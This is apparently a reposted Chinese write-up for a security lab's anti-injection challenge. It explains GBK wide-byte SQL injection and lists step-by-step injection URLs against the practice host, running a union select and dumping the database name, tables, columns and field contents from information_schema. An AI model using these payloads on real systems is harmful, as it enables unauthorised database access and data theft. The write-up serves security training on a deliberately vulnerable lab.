欢迎使用CSDN-markdown编辑器

来源:互联网 发布:广州网站seo 编辑:程序博客网 时间:2024/06/07 01:18

网络安全实验室 注入关:防注入-writeup

平台链接地址


本题主要考察的是宽字节注入

介绍

GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节,实际上只有两字节。宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象。

GBK编码,它的编码范围是0×8140~0xFEFE(不包括xx7F),在遇到%df(ascii(223)) >ascii(128)时自动拼接%5c,因此吃掉‘\’,而%27、%20小于ascii(128)的字符就保留了。

测试注入点

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php%bf%27

使用联合查询

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%bf%27 and 1=2 union select 1,2,3%23

爆数据库名

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%bf%27 and 1=2 union select 1,database(),3%23

爆表名

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%bf%27 and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=0x723037363663706C7573687561%23

爆列名

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%bf%27 and 1=2 union select 1,column_name,3 from information_schema.columns where table_name=0x7361655F757365725F73716C6934 limit 0,3%23

爆字段

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1¿’ and 1=2 union select 1,content_1,3 from sae_user_sqli4 limit 2,3%23
这里需要用到limit 一个一个去试

key:

这里写图片描述

0 0